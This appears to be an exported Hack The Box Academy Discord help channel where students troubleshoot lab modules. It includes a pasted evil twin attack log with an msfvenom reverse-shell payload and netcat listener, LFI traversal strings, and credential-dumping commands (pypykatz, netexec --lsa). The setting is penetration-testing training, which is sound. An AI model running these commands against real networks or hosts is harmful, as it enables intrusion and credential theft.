Make sure you use the right quote set (in the terminal you may need to escape the quotes)

If you still need help, DM me

Is there any way to make the rdp session from the citrix breakout section in the winprivesc module be less painful? Opening a browser on that takes ages, I'd imagine the rest would be even worse

There is a little guidance on making RDP a little more efficient, but unfortunately, at least in my experience, Citrix IS pain.. Maybe the guidance here will speed up the RDP session a bit, some have found adjust the MTU to help with RDP issues, but that was more on actually connecting than performance IIRC. Only other suggestion I can give would be to ensure you are on the VPN location most appropriate, and lowest load showing on the VPN settings screen

If you want to check latency from your connection to the VPN edge server, you can check the ping to the host defined in your ovpn config file (e.g. edge-eu-academy-1.hackthebox.eu)

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_480d492483

https://academy.hackthebox.com/vpn

Hello there, i am actually doing the SQLMap fundamentals module and i have a question, does SQLMap works on https ?

I found people saying yes and people saying no...

Yes

Anyone who's done the recent "WiFi tools and techniques" module could sanity check me quickly for SA Q5? I've done all the other ones, but I'm hitting a skill issue on this one it seems.

Thanks! I'll check it out

You might need to add --force-ssl

just found the answer reading the man ^^

Does anyone manage to get the "XSS and CSRF Exploitations - XSS Filter Bypasses task" working? Facing werid cors error from browser, but it was working the whole module lol

so weird.

also, the module seems have been updated, no such things as exfiltrate.htb which was mentioned in the academy forums.

Hey @all. i am facing an issue on Module "SQL Injection Fundamentals". In the Assessment part , i don't know why i get 400 bad Request (target given )

can somebody help me that how to connect vpn in htb lab or how to import dowmload file of vpn in htb .Is htb -lab and htb-machine have same pwnbox ??

Hit up that "Introduct to lab access" link, that should guide you.

Labs (app.hackthebox) and Academy (academy.hackthebox) are different. This channel is for discussion of Academy modules.

The Pwnbox on whichever platform you are using it on will share the same VPN configuration, and you cannot connect to the VPN from multiple places at once

On app.hackthebox, there ARE different VPN configs per lab type, such as Pro Lab, Fortress, Machines, etc etc

bro i actually understand this (lab access). but when i treid to connnect it through vpn it didnt send any output and took long time and failed to connect . i aslo treid troubleshoot

I'd suggest speaking in #1024429874246590575 and providing more information past "it took a long time and failed to connect", e.g. logs

..or raise a ticket with support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Document and reporting practise lab. I can’t find the admin credentials to log in to the report writing web app on port 443 as mentioned in the course . The admin credentials are not provided . Please help !

Hello guys ! I have a question ! Yesterday when I was doing a lab , I managed to find retrieve a domain user’s credentials and I ran bloodhound-ce-python ingester to get bloodhound loot . However , when I imported the loot it uploaded and ingested all right but when I tried to ran some basics cypher queries such as find all domain admins I get no information . However when I try other manual tools on the compromised machine such as Get-DomainGroupMember -Identity "Domain Admins" -Recurse` , get all domain admins which confirms that exist but bloodhound does not show them . Any idea why this might be happening ?

it work

still stuck?

Yess

you can DM me

Check your DMs

hello, i have a quick question about Interacting with Users page 25 in Windows Privilege Escalation module, the hint said that i should find a shared folder that my user are writeable, however, i check smb share and i can't write to this share folder. Please help!

nxc only shows that you are granted write access to the share not the folders it contains

try to verify if you can upload files to the directories in the share

dunno if there is a method to automate that in nxc

nxc is crackmapexec btw *

just newer version

i also access to RDP and check icacls and it said i cannot 🙁
i'm in BUILDIN\Users and target to sccm_svc user

Guys how do I install gopherus in python3?

hmmm, those permissions can be overriden on subfolders in the department shares folder if specified

I think you should check the permissions on the subfolders too

oh thank you, let's me check

you can combine those 2 commands to automate the process if you'd like

You can also use the --put-file option in automation with nxc to upload a file to each directory, and validate whether you have write access based on the tool's output

if you don't feel like reviewing the ACLs

oh nice command, can you give me the automation command that will upload the file to each directory? this one kind of new for me. normally i just review ACLs. and thank to you, i know i missed critical information

--put-file FILE FILE
Put a local file into remote target, ex: whoami.txt \Windows\Temp\whoami.txt

use nxc smb -h for more details

oh thank you

Hello guys, can someone help me in File Inclusion module?
in section basic bypass

I when I add . to the URL it says Illegal path specified!

I tried to encode that and it didn't work

also when I try to use this url

it still say the same thing.. when I try this also
languages/../../../../etc/passwd
this time it shows nothing.
some clue?

Try going up more directories

languages/../../../../../../../../../../etc/passwd

like this?

shows nothing

hhmmmmmmmmmmm

../../../../../../etc/passwd
also this didn't work even when I encode it

God please help

Did you actually try the teached bypass methods ?

Because the solution is taught in the section

I tried three of them
Non-Recursive Path Traversal Filters
Encoding
Approved Paths

I tried to do something like ..//..//
also tried to aways put the languges directory in the path and encode it

||if(preg_match('/^./languages/.+$/', $_GET['language'])) {
include($_GET['language']);
} else {
echo 'Illegal path specified!';
}||

but when I try to visit

./languages/../../../../../etc/passwd

it does not like the ./ in the beginning. but even when I encode it doesn't work

I am stuck with something in the Using Web Proxies/Repeating Requests. I had to look into the solutions, cause I could not find anything pointing me to figuring out how to find the root where the flag is and i definitely could not get my burp suite to read it. The last time I read the flag, it was in the repeater tab (purely by accident) and I actually (also purely by accident) linked the ls and cat commands together and i got the answer. Why can't I get the repeater to read the .txt??

dm please

This. Command : pypykatz lsa minidump /home/peter/Documents/lsass.dmp and this command: netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa do the same thing ? Or they are two separate things ?

Different, one is lsass and the other is lsa

Which of the two does mimikatz do ?

The first is parsing an lsass memory dump and the second is live dumping lsa secrets from the SECURITY hive in the registry

Yes I know this but the result should be the same ?

Mimikatz does both

No, one is the lsass process memory dump the other is the SECURITY hive

Ok thank you

Sometimes some overlap but they are not the same

Skill Assessment - Parameter Logic Bugs (CWEE course) - Has anyone had trouble running the docker for the assessment as provided?

I had to add the following line to the Dockerfile

RUN apt-get update && apt-get install -y libatomic1

Now the image gets created but it won't run.

Can someone help me or give me a hint in SQLi fundemintals-Skill Assessment? "chattr website"

dm please

what mean dm?

inbox me

Hello, mind if I DM about this? I also might be able to help if you still need it.

Hey man I got it but if you need anything sure DM me

thanks

is Attacking Common Services - Attacking FTP they are asking the ftp port number i tried various scans enumerated smb and foubd an id-rsa (which has no permission ) im s stuck

The writeups must be wrong then..

Writeups for Tier 2 also, oh dear

Regardless of whether you're running off of writeups, did you actually repeat the exercise yourself instead of just pasting the answer @proven spear ?

yup

i visited archive sites it redirect me to a .org site

i just randomly typed 2121 and it accepted that but tried to scan in multiple ways the port shows its not opened

I don't know what to say, many others go tthe correct answer, perhaps go through the task once more to be sure you've not made a mistake somewhere

ok ill try thank you !

Randomly? Ok.. I just tested and the target is working correctly. Make sure you're on the correct VPN, and are using the target IP assigned to you

yeah becasue normally if the port aint 21 in ctfs it might be 2121 juast like http 8080 a guess

Fair enough

But yeah, check your VPN

The target definitely works

hi just an generic doubt, to spawn the HTB academy docker instances do we need to have subscription? or if once unlocked with cubes am I good to go?

reseting the vpn rn

You can spawn the interactive sections of any module you have access to

That includes Tier 0 (free) modules

If you unlock a module with Cubes, it is open to you to spawn AFAIK

Same as if you had completed it under a subscription

I think

Hey guys!

I'm new to windows/ad and now while I was going through the Active Directory Enumeration & Attacks - Access Control List (ACL) Abuse Primer, two seemingly contradictory sentence got my attention: "Every object has an ACL, but ..." and "If a DACL does not exist for an object, all who attempt to access the object are granted full rights."
So that means it is possible that an object has only a SACL, so the access is logged but all access is allowed since there's no DACL?

It's working fine @soft stratus - pay attention to the section content

sorry will check thanks !

finally found it lmao i was so stupid

just needed to visit /swagger/index.html

ty i actually found the anwer i had a display (html/css) problem !

Be wary of what you post @soft stratus, that is a Tier 2 module after all

my bad sorry

Q: What's the difference between ||sudo tcpdump -rX /tmp/capture.pcap|| which is in the order of the question's phrasing, and was wrong, and ||sudo tcpdump -Xr /tmp/capture.pcap|| which was correct?

||Question's phrasing: "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)"
[Read comes first, then showing in HEX & ASCII comes later].

||
And to provide some context the previous question said ||"please answer in the order the switches are asked for in the question."||

You can use -h and check

hello, i need help with session Pillaging for module Windows Privilege Escalation question 5: Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.
i tried to backup for SAM and SYSTEM file but get access denied.

Can anyone give me a nudge on the Active Directory Trust Attacks - Skills Assessment, last question for compromising fabricorp.ad, I cant find a way to elevate from MSSP. The fabricorp DC is not responding on ldap from MSSP DC

Have you run Sharphound on mssp to collect on fabricorp?

Ive tried but it SharpHound fails when I specify -d fabricorp.ad --domaincontroller dc05.fabricorp.ad, it states the LDAP connections attempts fail

Ive reset the lap in case it was buggy, but same issue with fabricorp LDAP not responding

You can DM if you'd like.

If the PWNBOX doesn’t work for non-paid users. If I buy some cubes does that make me a paid member?

Or do I have to subscribe to annual billing?

And choose a path

Or silver membership?

hey guys, is any1 facing issues with spawning targets?

yes

Are you sure?

fairly certain considering that's how my account has been for a while

If the user doesn't have the rights to access or copy the content of a directory, we may get an Access denied message. The backup will be created, but no content will be found.

Did you checked any backups already saved in repository?

oh, i already solved it 😄 haha thank you btw

Are the images in the Academy also not loading anymore for someone else?

I am doing the modul User Management from the Linux fundamentals. I am stuck at 2 questions... i tried already with my personal brute force algorithm (my handy and the web) every thing but i cannot find the answer for 2 questions. I am sure this is a a thing where I wrote a letter in capital which i shouldnt, or other way around. therefore i wanted to ask if anyone could help with these 2 questions:

1. Which option needs to be set to lock a user account using the "usermod" command? (long version of the option) ==> My Answer is "-L"
2. Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option) 00> My Answer is "-c"
   none of the work. I tried with sudo usermod, just usermod etc... keep getting errors. can someone help?

Use the long version of the option/flag as your answer

Having problems in pass the hash question + 0 Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

Not able to find any david.txt inside the share

If you did this correctly and can access the share, but there is no flag inside the share, you likely need to reset the lab. You can DM what steps you took and your command with the empty share if you'd like me to confirm it before you reset.

What if I evil winrm david ?

Directly*

You can try whatever you want, but if I remember correctly that section is pretty much a direct walk through in the lab. I could be wrong though.

Okay thanks I'll try once again

hello guys... I'm having some problems and dont know the right channel to ask for help...I was doing a module and solving the exercises via VPN. Everything worked fine... now when I got to the final exercise vpn connects, i can ping the box but I cant access the box on the browser, I cant curl the box... I cant do anything but ping... but inside the vm on the website it works fine... already change the vpn node, rebooted my system and nothing...can you guys point me to the proper place to get help?

hi, i'm working on module/226/section/2451 Suricata Rule Development Part 2 (Encrypted Traffic).

i can't reach via ssh the target. i'm connected to the academy vpn

hello guys I'm jus wondering if I'm stuck in a skill assessment should I ask for hints or no ?

i'd say depends on how long you worked on it. sometimes it takes days. i'd recommend going over the content again in the modules, sometimes there are key things in one little line you can miss. i would only come ask for help after i've been stuck for a long time, but that's just me and how i operate.

hi, i just started the academy and i'm trying to use WSL2 on the premade Windows Developer VM that you get from the Setting Up/windows module, i've already followed the steps until "Windows Subsystem for Linux 2", but i'm having issues when it ask me to type "bash" in the PowerShell i've been trying for 4 hours with no results

hello, can anyone check the Windows Privilege Escalation Skills Assessment - Part I machine, i cannot ping to the machine, i tried to reset several times. i can access to normal machine. Please help!!!!!

can anyone help me with broken authentication module, brute forcing password reset tokens
https://academy.hackthebox.com/module/80/section/767

DM me

Hello.. I need help with LFI module..

hey can u help me?

ok DM me

anyway.. I was saying that they told me to bruteforce for params in this section..

https://academy.hackthebox.com/module/23/section/1494

but actually the the response will be always when you fuzz for params so ffuf can not know the different

so I used a tool calles fallparams and got 2 params.. then used a huge wordlist for LFI even bigger than they said I should use and found nothing

Yes youll always get a 200 response, but the length will be different

pls

anyone?

I filterd the length that I always get witch is 2309

but when I do that basically I get nothing

Windows machines dont always respond to pings

and that is normal because even if the param is used it may not cahnge the length of the page

Yeah, theres only 2 params. And yes, the right parameters will change the length

Because it'll provide a different response

i also tried nmap and xfreerdp, crackmapexec but not work

hold on let me cook

ip a if you have multiple tun connections:

• sudo killall openvpn
• reconnect to the vpn

If that still doesnt fix, change vpn regions, close the vpn connection, spawn a new target

If that doesnt work, reach out to website support

see

same length

so i suppose to connect with the machine by xfreerdp and htb-student credential?

What if I told you those parameters arent correct

OOHHHH shihihiiittttt

thaattt imparaassinnggg dont tell meeee

I mean it is fallparams creator problem not me

right?

🥺 .

It could be both

but I already used big.txt with ffuf and filtered that size.. get nothing..

anyone?

burp-parameter-names should be used to find parameters

OOHHHHHHH

ok let me see

This is in the reading btw

stop embarrassing me here!!!!! I had enough

I mean with this I can not show for months

can u help me out?

haven't done that module so i can't offer a meaningful nudge, the module probably teaches you how to get other user info

he already has the flag

nowhere in their message do they indicate they have the flag.

burp-parameter-names.txt did not work

I downlaod it from github

it should work :)

you had the right filter size for ffuf

I did not even filter nothing shows

then something you're doing is wrong

please don't tell me I am stupid

or the target died

because if you look

errors:2588

oh

how did he die

it jsut 30 mins

time, it hated itself, it hates you

NOOOO!!!!!!!!

many such cases

cannot connect to RDP session it just fails or entirely laggy im using it on pwnbox tried all different regions

no avail

bruh cool support thanks for the help

discord isn't an official method of support, there could be a handful of reasons for RDP being weird; https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn at the bottom has an rdp command that may be helpful for lagginess

thnx

im on the Pentest in a Nutshell module and the Windows System enumeration part

the question is What is the exact OS Version that WinPEAS delivers?, but winpeas output did not return system information because it didnt have enough permission to run the .exe
i did run get-computerinfo
OsVersion : 10.0.17763
the checker says its wrong

i did also run a powershell script to get the full version which was 10.0.17763.2628, but that is still not the answer the checker expects

Did you try running cmd as admin to run the .exe?

pls

I didnt go that way, because I suppose in a real case scenario i wouldnt just be able to run something as admin and wanted it to be an enumeration only challenge. Afterwards I just tried version formats until one luckily worked :D

thank you... first day... thats why i asked to be pointed to the right place... thanks for your help

Hello everyone, I need a help on JS Deobfuscation module, section 6. I find the right flag, but it is not acceptable. I don't know what I missing.

1. don't work ahead
2. make sure no extra whitespaces in your copy/paste

i'm not pasting the full flag per ToS
HTB{1_..r!}

Can I show you the flag in private?

sure why not

told you not to work ahead

Thank you!

Can someone help me with a module? I cannot get it working

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

witch one

Wi-Fi Evil Twin Attacks - Skills Assessment > Q2.) Compromise a client device on the "PulseGrid"

I'm getting the HTTP requests, but no connection from client

wifi@Attica:~$ sudo systemctl restart NetworkManager
sudo airmon-ng start wlan0

Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    180 avahi-daemon
    195 wpa_supplicant
    199 avahi-daemon
    701 NetworkManager

PHY    Interface    Driver        Chipset

phy1    wlan0        mac80211_hwsim    HTB Chipset of 802.11 radio(s) for mac80211
        (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
        (mac80211 station mode vif disabled for [phy1]wlan0)
phy2    wlan1        mac80211_hwsim    HTB Chipset of 802.11 radio(s) for mac80211
phy6    wlan2        mac80211_hwsim    HTB Chipset of 802.11 radio(s) for mac80211

wifi@Attica:~$ sudo airodump-ng wlan0mon -w HTB -c 1
19:58:32  Created capture file "HTB-01.cap".

<SNIP>                        
 52:DC:8C:79:EB:87  06:03:41:2B:28:E0  -29    1 - 9      0       15  PMKID  PulseGrid                
<SNIP>

wifi@Attica:~$ cat hostapd.conf 
ssid=PulseGrid
interface=wlan1
channel=1
hw_mode=g
# Mana Attack Configuration
enable_mana=1
mana_loud=1
# WPA AP Configuration
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=PSKmismatchmaker

wifi@Attica:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
nc -lvnp 4444
Would you like to use and setup a new database (recommended)? yes
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

Listening on 0.0.0.0 4444

wifi@Attica:~$ sudo ifconfig wlan1 down
wifi@Attica:~$ sudo macchanger -m 52:DC:8C:79:EB:87 wlan1
Current MAC:   8a:0f:7a:a8:09:bd (unknown)
Permanent MAC: 02:00:00:00:02:00 (unknown)
New MAC:       52:dc:8c:79:eb:87 (unknown)
wifi@Attica:~$ sudo ifconfig wlan1 up
wifi@Attica:~$ sudo hostapd-mana hostapd.conf
Configuration file: hostapd.conf
Using interface wlan1 with hwaddr 52:dc:8c:79:eb:87 and ssid "PulseGrid"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED 
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
Unsupported authentication algorithm (3)
handle_auth_cb: STA 06:03:41:2b:28:e0 not found
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0
MANA - Directed probe request for SSID 'PulseGrid-INT' from 7e:88:06:b5:71:76
MANA - Directed probe request for SSID 'PulseGrid' from 06:03:41:2b:28:e0

omg HTB even teach evil twin

I know, I know. I think we have talked before. It is still about them lxc containers.
My skill in networking is not good enough to understand how to get them running on my laptop

there is a thing i don't understand in the file inclusion module in the section of the log poisoning
why after i add in the log file the php script to get the shell and then run a command using this shell
like index.php?language=/var/lib/php/sessions/sess_asttmm182ahi117n0eqnv5lfpu&id=ls / if i ran another command it don't work until i send another request with the php rce ?

The module doesn't require you to mess with creating containers. Just move on

Because it doesnt update until the refresh, timing stuff

I know, can I shoot you a DM?

Im not familiar enough with lxc/lxd to be of any help

It is more about networking, I guess.
I have no problem creating those containers. That works just fine. Problem is that I don't have access to the internet.
On my VM it works without a problem, but on the laptop I am really struggling to understand the process of bridging or forwarding the connections?

I know it is not essential to have those containers, but I see it as an opportunity to learn and get a better understanding of networking.

That's gonna be a lot of Google troubleshooting. I suggest moving on and coming back to this at a later date

the final boss

Alright, I have spent a lot of time on this but I have no idea if I am even on the right track.

and I will never use fallparams again

Hey ppl I could use some help with the network foundations module - components of a network it doesnt take my answer in the first question what cable is used to transmit data over a long distance with minimal signal loss .. Its clearly fibre-optic IMHO but it tells me its wrong ?

Are you sure you're spelling it right? (Also dont include the word "cable"

K thx

In WI-FI Evil Twin Attacks, for anyone with the fluxion error message: "aborted, xterm session failed", typing this commandxhost +SI:localuser:root fixed it for me.

sooo....

maybe I should wait for 1-2 days

oh

it wass simple

Next question relared to the network foundations DNS : i think Theres a logical error since the first thing a PC checks in the DNS Resolution Process is not the local DNS Cache but the Hosts file since the hosts file overrides any entries made in the cache - or am i wrong ? 😅

@fathom pendant hey can I ask you about something please

i nrrf help about that + 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

For fucks sake

<@&861185840277487616>

I'm not able to help with content, no. Ask for guidance, but without spoiling or pasting massive output like that which may spoil content above Tier 0 https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

?

omg what is that

You didn't even read what I said

sry

now ok?

Yes, you can't just post module information like that above Tier 0, please read the above link and the channel topic

Someone may or may not be able to hop in to chat with you

ok can you help me?

like a tip ?

I literally just said that I'm unable to help with content

sry im working for 12 hours constant and now that....

chill💋 💕

yes

I'm perfectly chill, thank you.

the wordpress one

Thank you aw0ken

yes but my issue is to find the vuln in the ouput, but im not allowed to post it here

Hi, I am doing the "Online PIN Brute-Forcing Using Reaver" however reaver continuously gets "EAPOL START request" when trying to bruteforce the pin. Even after extendint the wait time. Here is my command:

'''
sudo reaver -i wlan0mon -vv -b 4A:60:21:C3:7E:8D -c 1
'''

Anything I am missing here?

You'll get a better response if you state the module/section/question you're on

Wifi Pentesting - Online PIN Brute-Forcing Using Reaver

from what I have found online seems other have had the same issue, not knowing if its expected to take over an hour, or if reverting the machine is required, but from what I see, it just constantly times out after sending the EAPOL request

I don't think that's a module

my bad: Attacking Wi-Fi Protected Setup (WPS)
Online PIN Brute-Forcing Using Reaver

Hey all, I'm wracking my brain on what I'm doing wrong with the DnsAdmins module. I've reset the target probably 4 times now, I've rebuilt the adduser.dll numerous times, but nothing seems to make my process's results match the workflow. I try loading the DLL as a non-privileged user, and it passes, it doesn't fail. I then try loading the DLL as member DnsAdmins, it does say that I am memeber of DnsAdmins after all. This passes. I try to then get my SID for "netadm" and it says it's an invalid query. I can't get past this, because even though sc command says I have RPWP, when I stop/start the dns service it doesn't change anything. and When I confirm the group memebership for "Domain Admins" it doesn't list me as a member of domain admins. I've even tried using the adduser.dll from C:\Tools, and that doesn't change anything either.

@fiery light Please do not reveal attack paths for skill assessments

Hi everyone, can someone help me with this question under Javascript deobfuscation module?

I have got a flag but that is not being accepted as an answer.

Best to say which section too

deobfuscation section

Make sure you're using the whole format, ie. HTB{flag_here} not just flag_here

yes I am using the whole HTB{} format

You can DM me the flag you have

Check for additional spaces before/after the flag

it's also a common section where people work ahead of what's expected

they get it deobbed then work ahead with the deobbed code

Module Information gathering - web edition section web archives. When i go to the hackthebox website on the wayback machine on these two dates, i get this page and I can’t find the answers. The problem is with these two questions only.

Sorry for the atrocious quality

if you read back through the section you'll find out that hackthebox.com wasn't always a .com

Thank you

Are there any plans to improve performance of any of the modules that use RDP?

Module Android Application Dynamic Analysis Section Exploiting WebViews. I have the flag but I can only visually see it and can't copy and paste. There's a mix of letter 'I' and 'l' which makes it confusing. I submitted a few times but the flag is wrong. Anyone can help?

i am stuck at the same thing, did you slove the module ?

Module "Android Application Dynamic Analysis" Section "Insecure Library Load Through Deep Linking" - I am following the module but my app doesn't update to v2.0 when I click the Update link. I think it's causing problems for the module assessment. Anyone can help?

Windows Process Injection: Can get the Process Injetion Payload to run fine on DEV but not on the Target Machine. Have also double checked and ran the Solution which also still doesnt work.

I have been making a C# Console App as RELEASE/x64 like some other advice people have been given but its still not working :/

Anyone got a workaround?

can somebody tell me that acessing to linux fundamentals and its modules there are some modules which have some explaination but when you see the queitons that are present below the module . these questions are very different from those command that i just learnt . for example i learned cat /etc/passwd command and the question they asked about ports why ??

I'm pretty sure I just followed along with what was presented in the section and had no problems with it working on DEV and the TARGET host.

Okay ty, will just try again at somepoint 🙂

nope some moudules of linux are not connected to the quesitons that asked 😫

This is by design, not to the distorted example youve mentioned but the Lab you launch at the end is designed to test your understanding of the material, in most cases they require you to launch the lab to figure out the specifics of that environment and answer accordingly.

To complete Footprinting lab, I used xfreerdp3, but I would like to know how may I specify the "type" / language of the keyboard? Is there an option for this? Thank you :).

There is, change the system language of the machine you're on. It uses that as far as I know

keyboard settings, for example US to UK, I change the keyboard layout to UK and delete the US one. Then connecting to xfreerdp it uses UK then

I don't want to edit my own system...

I would like to know if there is an arg in the command.

Understood, when you find out let me know... maybe try the man page.

you can use xfreerdp3 with /kbd option

Noice!

And there is a value with this arg or it's auto selected?

you can use /kbd-list with it to list the keyboard languages

I think that's an older syntax, better to use /list:kbd

Alright thanks!

https://www.gsp.com/cgi-bin/man.cgi?section=1&topic=xfreerdp3 i'm just going off this; which does note /list:kbd is the syntax

Yeah this one is deprecated

can I install android studio and use its emulator on Kali virtual machine ?

yeah probably

anybody did Wi-Fi Evil Twin Attacks - Skills Assessment ?
I am stuck at 1st and 2nd question

I started a module call network foundations and I reached Skills Assessment Ch 3, I followed the instruction entered passive mode (10,129,166,17,194,11) and calculate the real FTP port (P1 * 256 + P2 = 194*256 + 11 = 49675), afterthat I typed nc -v 10.129.166.17 49675 which return connection refused. What did I do worng? How should I fix it. Thanks.

try with -nv not just -v

For future students. In Wi-Fi Evil Twin Attacks, the WifiPhisher plugin update attack walkthrough didn't work for me on the "twins" RDP box. I think the MSFVenom payload generator on the box might be bugged. I was able to transfer a working MSFVenom shell.elf payload from my own Kali instance to the "twins" box and get the shell to connect from the victim.

I tried -nv , but there still a connection refused pop up, no diea why the port is not open

WEP attacks - korek chop chop attack. Has anyone completed this? Something in this module isn’t explained well and I’m missing something. The attack doesn’t seem to work.

no I already did it won't work ,what you can do is install android studio directly on windows and connect to it from vm

I've spent hours to try it , it didn't work , I will try your idea

Hey all, I’m working on the SA2 exercise (VBScript → payload execution → AMSI/CLM context) for the Introduction to Windows Evasion Techniques module.

I have a VBScript in C:\Alpha\SA2 that runs an EXE from C:\Windows\Tasks.
When I run the chain manually as my assigned user, the EXE runs fine, AMSI gets patched, and the payload executes.

However, when the victim user runs the exact same VBS (via the provided harness command), the behaviour is very different:

The VBS definitely runs (confirmed in the harness logs).

• Defender does not block the script.
• The EXE is never executed:
• no debug file from the EXE,
• no network activity,
• no errors from VBScript,
• harness times out after ~45 seconds.

AppLocker shows that binaries in C:\Windows\Tasks should be allowed for the victim user, so on paper it should run.

Because the EXE never executed, the only way I could solve the exercise was to avoid PowerShell entirely and use pure VBScript to read the flag directly from the victim user’s Desktop.

My question is : Is this the intended path for SA2, or is the goal to actually get a reverse shell (or PowerShell execution) as the victim user? If a revshell is expected, I can’t figure out how to get past whatever is preventing the EXE from executing.

Any hints or clarification would be appreciated!

if you can't connect to adb from your vm open a ssh server from your windows machine Start-Service sshd and try to connect to the spesific port of adb in your vm for example here the adb is running on port 5555 on my windows machine ,on kali : ssh -L 5555:127.0.0.1:5555 username@<my-windows-ip> then adb -s 127.0.0.1:5555 shell you will get the shell of your android device

Thank you very much 🤍

any hints for : module 171 section 1692 stuck on it for days

anyone able to give me a nudge on the XSS skill assessment ( can't seem to find the vulnerable field)? (got help already)

can you help me with question 1 and 2 in skill assessment. I missed something.

Hey all, I’ve made it to the dreaded thick client apps module of CPTS. I am stuck. I have the module step by step to create the .bat file from restart-oracleservice by modifying the Temp folder permission for cybervaca. Tried this multiple times and the .bat file isn’t created in the Temp\2\ directory. Procmon shows a bat file is made in some \Temp6BAC.tmp \ directory, but it isn’t accessible when I try to navigate to it

Hi there. I've only recently started with htb and currently working myself through the 'Getting Started' module. Currently doing the nmap exercise:

Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

I'm running an nmap using the following command:
nmap -sV -sC -p- <target ip>

The first 40% or so of the portscan progresses quickly, but then slows down to a crawl to an extend the target will run out of life before it completes. Is this expected behavior? How do I avoid getting throttled? Using a pwnbox.

**Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 41.51% done; ETC: 11:33 (0:01:18 remaining) Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 41.58% done; ETC: 11:33 (0:01:23 remaining) Stats: 0:02:42 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 42.05% done; ETC: 11:37 (0:03:43 remaining) Stats: 0:30:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 44.36% done; ETC: 12:39 (0:38:02 remaining)**

hope i wont get flagged for spam... but anyways

do you guys recommend any htb module for a job interview for handling incidents like spam/phishing/etc?

run man nmap and look at what everything is doing if you are unsure. There are some useful switches that might help nmap scans not waste time with ports that are not open and only run tests on ports found to be open. This can be a major reduction in traffic.

how is hashcat module tier 2 but password attacks tier 1? i find the second one significantly harder

The first time one starts msfvenom it prints some stuff about “thanks for using msfvenom”, so if your first call to it directly pipes into the elf file you get that message as part of the same file and it doesn’t work as a rev shell anymore. If you run it a second time it works fine

I had to switch the VPN, in aireplay-ng you need to select a packet from the client to the AP that is not too small. On one of my instances I would just not get such a packet, it would only give me <40 byte packets or not originating from client/to ap. Once I switched the vpn region it worked immediately

you are running all scripts (many) against all ports with -sC and -p-. It is much faster if you run -p- without -sV and -sC first and then rerun -sV and -sC only on the discovered ports

Yo guys im stuck on IDOR mass enumeration in web attacks, the browser says waiting for weloveiconfonts.com, the browser times out when trying to manually reach this domain

Is there a way to skip reaching that domain within the browser ?

cURL works fine for the target website

Add it to /etc/hosts with 127.0.0.1 as the IP address to avoid waiting for the timeouts

If you really don't need it

nice trick

Not working though

It works. Check the IP Firefox is checking. Might need to flush its cache

Browsers cache dns too

Use a different browser or private browsing mode

Yeah, a different browser worked

Thanks yall

im still on the same section 🥀
im supposed to perform IDOR on the uid parameter of documents.php, and get all the document of the first 20 users
however, doing so im not getting any files

dunno if sharing the command is a spoiler

Bump.

for the HackTheBox Attacking Wi-Fi Protected Setup (WPS) in the tasks it's very laggy and it takes a lot of time to get the PSK is this a global problem of from my side only (Please note that I'm using PwnBox not VPN)

you can DM me if you are still stuck